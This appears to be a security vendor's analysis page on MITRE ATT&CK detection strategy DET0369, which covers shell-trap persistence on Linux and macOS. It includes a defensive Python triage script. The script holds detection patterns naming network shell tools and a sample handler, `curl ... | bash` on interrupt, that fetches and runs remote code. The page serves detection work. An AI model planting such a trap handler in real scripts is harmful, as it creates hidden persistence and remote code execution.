MITRE ATT&CK® Detection Strategy

DET0369: Detection Strategy for Event Triggered Execution via Trap (T1546.005)


Enterprise | DET0369 | Detection Strategy | Object v1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

DET0369 is a MITRE detection strategy object for detecting Event Triggered Execution via Trap (T1546.005). The related ATT&CK technique covers the shell trap command on Linux and macOS, which registers commands that run when the shell receives a signal such as an interrupt; an adversary can use it to run content that supports persistence or privilege escalation. For leaders, the value is not the object itself, since MITRE provides no official detection text here, but the reminder to verify whether endpoint monitoring can see script and shell behavior that may hide inside normal administrative automation.

Executive priority

Treat this as a coverage-validation item for Unix-like endpoint resilience. Because the related technique maps to persistence and privilege escalation on macOS and Linux, security leaders should ask whether SOC and IR teams can review shell/script changes, command-line activity, and endpoint file/process telemetry quickly during an investigation. This is especially relevant where business-critical systems rely on scripts, scheduled operations, developer workstations, or administrator shells, because benign automation can make malicious trap usage harder to distinguish without baseline evidence.

Technical view

The supplied detection strategy object has no official description or detection guidance, so defenders should anchor validation to the related ATT&CK technique: Trap (T1546.005), affecting macOS and Linux, under persistence and privilege-escalation tactics. SOC and detection engineering teams should confirm visibility into shell and script execution, command-line arguments where available, script/file modifications, and endpoint process lineage involving shells or automation contexts. IR teams should be prepared to inspect shell scripts and startup or operational scripts for signal-handling logic that causes unexpected command execution, while avoiding assumptions that all trap usage is malicious because it is common in legitimate graceful shutdown and interrupt-handling code.

Likely telemetry

  • Endpoint process execution telemetry for shells and script interpreters on macOS and Linux
  • Command-line argument capture where available
  • File creation and modification telemetry for shell scripts and operational automation files
  • EDR or host audit events showing parent-child process relationships from shell/script activity
  • Shell history or administrative session records where collected and permitted

Detection direction

  • Validate whether telemetry can identify suspicious or newly introduced trap-related logic in scripts without relying on the DET0369 object for vendor-ready analytics, because MITRE supplied no official detection text.
  • Baseline legitimate trap usage in administrative and application scripts to reduce false positives; trap is commonly used for graceful termination and interrupt handling.
  • Correlate script modification events with later shell/script execution and unusual child processes, especially on systems where persistence or privilege escalation would create high operational risk.
  • Prioritize coverage on Linux and macOS assets, since those are the platforms supplied by the related technique.
  • During investigations, compare observed script behavior against expected operational automation rather than treating trap syntax alone as conclusive evidence of compromise.
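The inspection described in the Technical view and the validation, baselining and change-correlation steps in the Detection direction list above, as an added worked example that is not part of the original page or of MITRE's or Glexia's material: it pulls trap statements out of script text, follows a handler that names a function defined in the same script, flags handler content that a graceful-shutdown handler has no reason to contain, and suppresses fingerprints an analyst has already baselined. The indicator patterns, the startup-file path list, the three sample scripts, their paths and the 198.51.100.7 address are all constructed for the example and are assumptions, not data from the page.

```python
"""Triage helper for shell trap handlers (added example; not MITRE or Glexia code).
Extracts trap statements, follows handlers that name a function in the same script,
scores handler text against hypothetical indicators, and suppresses baselined
fingerprints. Sample scripts, paths and the 198.51.100.7 address are constructed."""
import hashlib
import itertools
import re
import shlex

SIGNAL_NUMBERS = {"0": "EXIT", "1": "HUP", "2": "INT", "3": "QUIT", "15": "TERM"}
OPERATORS = {";", "&&", "||", "|", "&", "(", ")"}
PRECEDERS = OPERATORS | {"{", "do", "then", "else"}   # tokens that may precede a command
STARTUP_FILE = re.compile(r"\.bashrc|\.bash_profile|\.zshrc|\.zprofile|\.profile|/profile\.d/")
# Hypothetical indicators: things a graceful-shutdown handler has no reason to do.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b", "downloads content"),
    (r"\b(nc|ncat|netcat|socat)\b|/dev/tcp/", "opens a network connection"),
    (r"\bbase64\b.*(-d|--decode)|\bxxd\s+-r|\bopenssl\s+enc\b.*-d", "decodes an embedded payload"),
    (r"\beval\b|\b(bash|sh|zsh|python3?|perl)\s+-[ceEi]\b|\|\s*(bash|sh|zsh)\b",
     "executes fetched or embedded content as code"),
    (r"\bcrontab\b|/etc/cron|LaunchAgents|LaunchDaemons|\.bashrc|\.zshrc|\.profile",
     "touches another persistence location"),
    (r"\bnohup\b|\bsetsid\b|\bdisown\b", "detaches a background process"),
]

def normalize_signal(tok):
    """'sigint', '2' and 'INT' all become 'INT'."""
    tok = SIGNAL_NUMBERS.get(tok, tok.upper())
    return tok[3:] if tok.startswith("SIG") else tok

def tokenize(line):
    """Split a shell line with quotes respected and ; | & ( ) as their own tokens."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    try:
        return list(lex)
    except ValueError:                       # unterminated quote: crude fallback
        return line.split()

def extract_traps(text):
    """Return [(line_no, action, [signals])] for each trap installed in the script."""
    found = []
    for no, line in enumerate(text.splitlines(), 1):
        toks = tokenize(line) if "trap" in line else []
        for i, tok in enumerate(toks):
            if tok != "trap" or (i and toks[i - 1] not in PRECEDERS):
                continue                     # not in command position, e.g. `echo trap`
            args = []
            for t in toks[i + 1:]:
                if t in OPERATORS:
                    break
                args.append(t)
            if len(args) >= 2 and args[0] not in ("-l", "-p"):   # -l/-p install nothing
                found.append((no, args[0], [normalize_signal(s) for s in args[1:]]))
    return found

def function_body(text, name):
    """Body of `name() {...}` / `function name {...}` if defined in text (heuristic)."""
    head = re.compile(r"^\s*(?:function\s+)?%s\s*(?:\(\s*\)\s*\{?|\{)\s*$" % re.escape(name))
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if head.match(line):                 # body runs until the first bare "}" line
            return "\n".join(itertools.takewhile(lambda l: l.strip() != "}", lines[i + 1:]))
    return None

def classify_trap(action, signals, script_text="", path=""):
    """Return (verdict, reasons); verdict is reset, benign, review or suspicious."""
    if action in ("-", ""):
        return "reset", ["resets or ignores the signal instead of running a handler"]
    reasons, handler = [], action
    if re.fullmatch(r"[A-Za-z_]\w*", action):            # bare word: a function name
        body = function_body(script_text, action)
        if body is None:
            reasons.append("handler '%s' is not defined in this script" % action)
        handler = action if body is None else body       # inspect what it actually runs
    hits = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, handler)]
    reasons += hits
    if STARTUP_FILE.search(path):
        reasons.append("installed from a shell startup file, so it returns in every new shell")
    return ("suspicious" if hits else "review" if reasons else "benign"), reasons

def handler_fingerprint(path, action, signals):
    """Baseline key; changes whenever the handler text or its signal list changes."""
    key = "%s|%s|%s" % (path, action, ",".join(sorted(signals)))
    return hashlib.sha256(key.encode()).hexdigest()[:16]

def scan_script(path, text, baseline=frozenset()):
    """Classify every trap in one script; baselined fingerprints are not escalated."""
    findings = []
    for no, action, signals in extract_traps(text):
        verdict, reasons = classify_trap(action, signals, text, path)
        fp = handler_fingerprint(path, action, signals)
        findings.append({"path": path, "line": no, "action": action, "signals": signals,
                         "verdict": "baselined" if fp in baseline else verdict,
                         "reasons": reasons, "fingerprint": fp})
    return findings

# Constructed samples: a normal cleanup handler, a handler that runs fetched code only
# when the job is interrupted, and a trap dropped into a user's shell startup file.
SAMPLES = [
    ("/opt/backup/nightly.sh", "#!/bin/bash\nset -euo pipefail\nWORK=$(mktemp -d)\n"
     "cleanup() {\n    rm -rf \"$WORK\"\n    echo \"workdir removed\" >&2\n}\n"
     "trap cleanup EXIT INT TERM\ntar -czf \"$WORK/etc.tgz\" /etc\n"),
    ("/usr/local/bin/rotate.sh", "#!/bin/bash\n# rotate logs\n"
     "trap 'curl -s http://198.51.100.7/u | bash' INT\ntrap - TERM\nfind /var/log -name '*.1' -delete\n"),
    ("/home/alice/.bashrc", "export PATH=\"$HOME/bin:$PATH\"\ntrap 'logger -t shell \"session ended\"' EXIT\n"),
]

def run(baseline=frozenset()):
    return [f for path, text in SAMPLES for f in scan_script(path, text, baseline)]

if __name__ == "__main__":
    for f in run({handler_fingerprint("/opt/backup/nightly.sh", "cleanup", ["EXIT", "INT", "TERM"])}):
        print(f["verdict"], "%s:%d" % (f["path"], f["line"]), repr(f["action"]), f["signals"], f["reasons"])
```

Run it directly to get one line per trap; for real content, feed script text through scan_script with a baseline set built from handler_fingerprint values that were reviewed during tuning. Because the fingerprint covers the handler text and the signal list, an edit to a known-good handler produces a new fingerprint and surfaces again, which is the script-modification correlation the list above asks for. The function-body lookup is a single-file heuristic: a handler defined in a sourced file is reported as undefined and left for review rather than silently accepted.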

Mitigation priorities

  • Inventory critical Linux and macOS scripts and automation paths that influence privileged operations or business-critical services.
  • Apply least-privilege and change-control practices to scripts and directories that administrators or services execute.
  • Enable or improve endpoint logging for process execution, command-line capture, and file modification on Unix-like systems where business risk justifies it.
  • Use file integrity or configuration monitoring for high-value scripts to support compliance evidence and faster incident scoping.
  • Document legitimate trap usage in managed scripts so SOC teams have context for triage and tuning.

Analyst notes and limits

This take is based on the DET0369 detection strategy metadata and its relationship to T1546.005 Trap. The object itself does not include official MITRE detection text, platforms, tactics, or description; the actionable context comes from the relationship showing it detects Trap, which is associated with macOS, Linux, persistence, and privilege escalation.

Local environment evidence is required to determine risk and detection quality. The supplied data does not provide specific analytics, event IDs, log sources, adversary usage, exploit activity, or vendor guidance. Recommendations are therefore framed as validation and control priorities rather than guaranteed detections.

Official MITRE ATT&CK definition

Detection Strategy for Event Triggered Execution via Trap (T1546.005)

No official description is available in the imported ATT&CK source object.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain      ID          Name   Relationship / procedure
Enterprise  T1546.005   Trap   Sub-technique; this object detects Trap.
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Raw hash: a6375177500599e2...

Imported snapshots across ATT&CK releases (1)

Release   Object version   Status           Raw hash
19.1      1.0              Current bundle   a63751775005…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1] mitre-attack: DET0369

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.